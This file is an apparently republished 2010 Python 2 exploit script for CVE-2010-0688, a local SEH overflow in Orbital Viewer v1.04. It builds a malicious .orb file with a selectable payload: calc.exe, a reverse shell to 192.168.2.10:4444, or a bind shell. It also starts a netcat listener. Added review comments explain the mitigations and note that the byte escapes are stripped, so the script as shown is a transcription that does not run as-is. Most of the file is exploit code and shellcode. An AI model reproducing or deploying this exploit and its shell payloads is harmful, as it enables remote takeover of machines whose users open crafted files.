orbitalviewer-overflow.txt
Posted on 27 February 2010
#!/usr/bin/python
# sinn3r: I'm just submitting this for mr_me
#
################################################################
#
# Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit
# Date: 27 Feb 2010
# CVE: CVE-2010-0688
# Download: http://www.orbitals.com/orb/ov.htm
# Found & exploited by: mr_me (http://net-ninja.net)
# Greetz to: corelanc0d3r/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz/Redsees
# Tested on: Windows xp sp3
#
################################################################
# Bad chars: x00x0axbdx0dx20
# Here we go.. ! ...all the way from Australia...
#
# [+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit
# [+] Shellcode options
#  1: calc.exe
#  2: reverse shell
#  3: bind shell
# [+] which shellcode? 2
# [+] Vulnerable file created!
# [+] Listening on port 4444...
# listening on [any] 4444 ...
# 192.168.2.55: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.10] from (UNKNOWN) [192.168.2.55] 2222
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Documents and SettingsSteve>
#
# NOTE(review): This is a 2010 proof-of-concept for CVE-2010-0688, a
# stack overflow in Orbital Viewer's .orb file parser that overwrites the
# SEH chain.  Root-cause fix is bounds checking on the parsed field in the
# application; SafeSEH on ov.exe, SEHOP and DEP are the system-level
# mitigations that this SEH-handler overwrite technique depends on being
# absent (not verified here).
#
# NOTE(review): As displayed on this page the escape backslashes are not
# present -- the literals below ("x41", "x90", ...) are plain ASCII text,
# not byte escapes, so the script as shown writes a text file and is a
# transcription of the original rather than something that runs as-is.
# The "Bad chars" line in the header is mangled the same way.
#
# NOTE(review): Python 2 syntax throughout (print statements, raw_input);
# this does not run under Python 3.

import sys, os

# Banner only; no effect on the generated file.
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit"

# Payload 1: Metasploit-generated, alpha_mixed-encoded (per the author's
# comment) -- launches calc.exe as a harmless "did it work" marker.
# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, CMD=calc.exe
calc = ("xd9xf7xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4ax48x51x54x45x50x43x30x45x50x4cx4bx51x55"
"x47x4cx4cx4bx43x4cx43x35x43x48x43x31x4ax4fx4c"
"x4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b"
"x50x49x4cx4bx46x54x4cx4bx43x31x4ax4ex50x31x49"
"x50x4ax39x4ex4cx4bx34x49x50x42x54x44x47x49x51"
"x49x5ax44x4dx45x51x49x52x4ax4bx4bx44x47x4bx50"
"x54x47x54x45x54x44x35x4dx35x4cx4bx51x4fx51x34"
"x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51"
"x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31"
"x4ax4bx4cx49x51x4cx46x44x43x34x48x43x51x4fx50"
"x31x4ax56x43x50x50x56x42x44x4cx4bx50x46x50x30"
"x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4c"
"x4bx42x48x45x58x4bx39x4ax58x4bx33x49x50x42x4a"
"x50x50x42x48x4cx30x4cx4ax44x44x51x4fx45x38x4a"
"x38x4bx4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43"
"x45x31x42x4cx43x53x46x4ex43x55x43x48x45x35x45"
"x50x41x41")

# Payload 2: reverse shell.  LHOST/LPORT are hard-coded to the author's
# lab host (192.168.2.10:4444, per the comment) -- the listener started
# at the bottom of the script matches that port.
# windows/shell_reverse_tcp - 636 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444
rev = ("x89xe6xdaxd8xd9x76xf4x5ex56x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx42x4ax4ax4bx50x4dx4bx58x4cx39x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx46x44x47x54x4cx4b"
"x47x35x47x4cx4cx4bx43x4cx45x55x43x48x43x31x4a"
"x4fx4cx4bx50x4fx42x38x4cx4bx51x4fx47x50x45x51"
"x4ax4bx47x39x4cx4bx47x44x4cx4bx45x51x4ax4ex50"
"x31x49x50x4ax39x4ex4cx4cx44x49x50x43x44x45x57"
"x49x51x49x5ax44x4dx45x51x49x52x4ax4bx4ax54x47"
"x4bx50x54x46x44x47x58x42x55x4bx55x4cx4bx51x4f"
"x47x54x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx45x51x4ax4bx43x33x46x4cx4cx4b"
"x4bx39x42x4cx51x34x45x4cx45x31x48x43x46x51x49"
"x4bx42x44x4cx4bx50x43x50x30x4cx4bx47x30x44x4c"
"x4cx4bx44x30x45x4cx4ex4dx4cx4bx51x50x43x38x51"
"x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4f"
"x48x56x45x36x46x33x43x56x45x38x46x53x46x52x43"
"x58x43x47x43x43x47x42x51x4fx46x34x4bx4fx4ex30"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx48"
"x56x51x4fx4dx59x4dx35x43x56x4bx31x4ax4dx43x38"
"x43x32x51x45x42x4ax43x32x4bx4fx48x50x43x58x4e"
"x39x45x59x4bx45x4ex4dx46x37x4bx4fx48x56x51x43"
"x46x33x51x43x51x43x51x53x51x43x47x33x46x33x4b"
"x4fx4ex30x42x48x49x50x49x38x44x42x44x4ax42x46"
"x42x48x42x31x51x4cx42x46x46x33x4cx49x4bx51x4d"
"x45x42x48x4ax4cx4cx39x4ex4ax43x50x51x47x4bx4f"
"x48x56x42x4ax42x30x46x31x50x55x4bx4fx48x50x45"
"x36x43x5ax42x44x45x36x42x48x43x53x42x4dx43x5a"
"x50x50x46x39x47x59x48x4cx4cx49x4ax47x43x5ax47"
"x34x4cx49x4dx32x50x31x49x50x4ax53x4ex4ax4ax35"
"x4dx59x4bx4dx4bx4ex51x52x46x4dx4bx4ex50x42x46"
"x4cx4cx4dx43x4ax47x48x4ex4bx4ex4bx4ex4bx42x48"
"x44x32x4bx4ex4ex53x42x36x4bx4fx44x35x47x58x4b"
"x4fx4ex36x51x4bx46x37x50x52x50x51x50x51x50x51"
"x42x4ax45x51x46x31x50x51x46x35x46x31x4bx4fx48"
"x50x42x48x4ex4dx4ex39x44x45x48x4ex46x33x4bx4f"
"x4ex36x42x4ax4bx4fx4bx4fx47x47x4bx4fx4ex30x43"
"x58x4dx37x43x49x48x46x44x39x4bx4fx43x45x43x34"
"x4bx4fx49x46x4bx4fx42x57x4bx4cx4bx4fx4ex30x45"
"x38x4ax50x4dx5ax44x44x51x4fx51x43x4bx4fx4ex36"
"x4bx4fx4ex30x41x41")

# Payload 3: bind shell on port 4444 (per the comment).  Note the script
# does not start a listener for this option; only option 2 does.
# windows/shell_bind_tcp - 695 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=192.168.2.55
bind =("xdbxc1xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx43x5ax4ax4bx50x4dx4ax48x4cx39x4bx4fx4bx4f"
"x4bx4fx45x30x4cx4bx42x4cx51x34x47x54x4cx4bx47"
"x35x47x4cx4cx4bx43x4cx43x35x44x38x45x51x4ax4f"
"x4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x45x51x4a"
"x4bx47x39x4cx4bx47x44x4cx4bx43x31x4ax4ex50x31"
"x49x50x4dx49x4ex4cx4cx44x49x50x42x54x44x47x49"
"x51x49x5ax44x4dx45x51x48x42x4ax4bx4cx34x47x4b"
"x50x54x47x54x47x58x42x55x4dx35x4cx4bx51x4fx51"
"x34x45x51x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4b"
"x51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4bx4d"
"x59x42x4cx47x54x45x4cx43x51x49x53x50x31x49x4b"
"x43x54x4cx4bx51x53x46x50x4cx4bx47x30x44x4cx4c"
"x4bx42x50x45x4cx4ex4dx4cx4bx51x50x43x38x51x4e"
"x43x58x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4fx48"
"x56x45x36x50x53x42x46x43x58x47x43x46x52x42x48"
"x43x47x44x33x50x32x51x4fx46x34x4bx4fx48x50x43"
"x58x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx49x46"
"x51x4fx4cx49x4ax45x45x36x4dx51x4ax4dx44x48x45"
"x52x46x35x43x5ax43x32x4bx4fx48x50x42x48x49x49"
"x44x49x4cx35x4ex4dx50x57x4bx4fx4ex36x50x53x46"
"x33x46x33x46x33x51x43x50x43x50x53x47x33x50x53"
"x4bx4fx4ex30x45x36x42x48x44x51x51x4cx43x56x51"
"x43x4cx49x4bx51x4dx45x43x58x49x34x44x5ax42x50"
"x49x57x51x47x4bx4fx4ex36x42x4ax44x50x46x31x50"
"x55x4bx4fx48x50x42x48x49x34x4ex4dx46x4ex4ax49"
"x51x47x4bx4fx49x46x50x53x46x35x4bx4fx48x50x45"
"x38x4dx35x51x59x4bx36x51x59x46x37x4bx4fx4ex36"
"x46x30x46x34x51x44x51x45x4bx4fx48x50x4ax33x43"
"x58x4ax47x42x59x49x56x42x59x51x47x4bx4fx49x46"
"x46x35x4bx4fx4ex30x45x36x43x5ax45x34x43x56x42"
"x48x42x43x42x4dx4dx59x4dx35x42x4ax46x30x51x49"
"x47x59x48x4cx4dx59x4bx57x43x5ax51x54x4bx39x4a"
"x42x50x31x49x50x4bx43x4ex4ax4bx4ex51x52x46x4d"
"x4bx4ex50x42x46x4cx4dx43x4cx4dx42x5ax46x58x4e"
"x4bx4ex4bx4ex4bx45x38x42x52x4bx4ex4ex53x45x46"
"x4bx4fx43x45x47x34x4bx4fx4ex36x51x4bx46x37x50"
"x52x46x31x46x31x46x31x42x4ax43x31x46x31x46x31"
"x46x35x46x31x4bx4fx4ex30x42x48x4ex4dx48x59x45"
"x55x48x4ex46x33x4bx4fx49x46x42x4ax4bx4fx4bx4f"
"x46x57x4bx4fx4ex30x4cx4bx46x37x4bx4cx4dx53x48"
"x44x45x34x4bx4fx48x56x50x52x4bx4fx48x50x45x38"
"x4cx30x4cx4ax45x54x51x4fx46x33x4bx4fx49x46x4b"
"x4fx4ex30x41x41");

# File layout, in write order:
#   header | junk | nops | <payload> | fly | nseh | seh
# The .orb signature: the hex values spell "OrbitalFileV1.0" followed by
# CR LF, i.e. the same magic the viewer expects at the top of a file.
header = "x4fx72x62x69x74x61x6cx46"
header += "x69x6cx65x56x31x2ex30x0dx0a"
# 1010 NOP (0x90) bytes preceding the payload.
nops = "x90" * 1010
# Author's jump stub placed right after the payload (5 bytes).
fly = "xe9xc8xf9xffxff"
# Next-SEH field (4 bytes) and the handler overwrite.  The author's note
# says the handler is a 3-byte partial overwrite pointing at a
# pop/pop/ret inside ov.exe -- i.e. it relies on ov.exe lacking SafeSEH
# and on the load address of ov.exe being fixed.
nseh = "xebxf9x90x90"
seh = "x50x82x45" # partial overwrite - ppr from ov.exe

print "[+] Shellcode options"
print " 1: calc.exe"
print " 2: reverse shell"
print " 3: bind shell"
msg = '[+] which shellcode? '
uin = raw_input(msg).strip()
# Only the empty answer is rejected here; any other value not in
# {'1','2','3'} falls through with `lol` unbound (see below).
if not uin:
    print "[-] You have not entered 1,2 or 3, quiting"
    sys.exit(1)
# junk is sized so that junk + payload is always 5045 characters,
# keeping fly/nseh/seh at a fixed offset regardless of payload choice.
if uin == '1':
    junk = "x41" * (5045 - len(calc))
    lol = header + junk + nops + calc + fly + nseh + seh;
if uin == '2':
    junk = "x41" * (5045 - len(rev))
    lol = header + junk + nops + rev + fly + nseh + seh;
if uin == '3':
    junk = "x41" * (5045 - len(bind))
    lol = header + junk + nops + bind + fly + nseh + seh;
# NOTE(review): if uin is something other than '1'/'2'/'3', `lol` was never
# assigned: open() succeeds (creating an empty file), write(lol) raises
# NameError, close() is never reached, and the bare `except:` below masks
# the real cause as "[-] Error occured!".  The bare except also hides any
# genuine I/O error for the same reason.
try:
    vulnerable = open("mr_me-owns-orbital.orb",'w')
    vulnerable.write(lol)
    vulnerable.close()
    print "[+] Vulnerable file created!"
    # Option 2 only: block on a netcat listener spawned through the shell;
    # the port matches the LPORT baked into `rev`.
    if uin == '2':
        print "[+] Listening on port 4444..."
        os.system("nc -lvp 4444")
except:
    print "[-] Error occured!"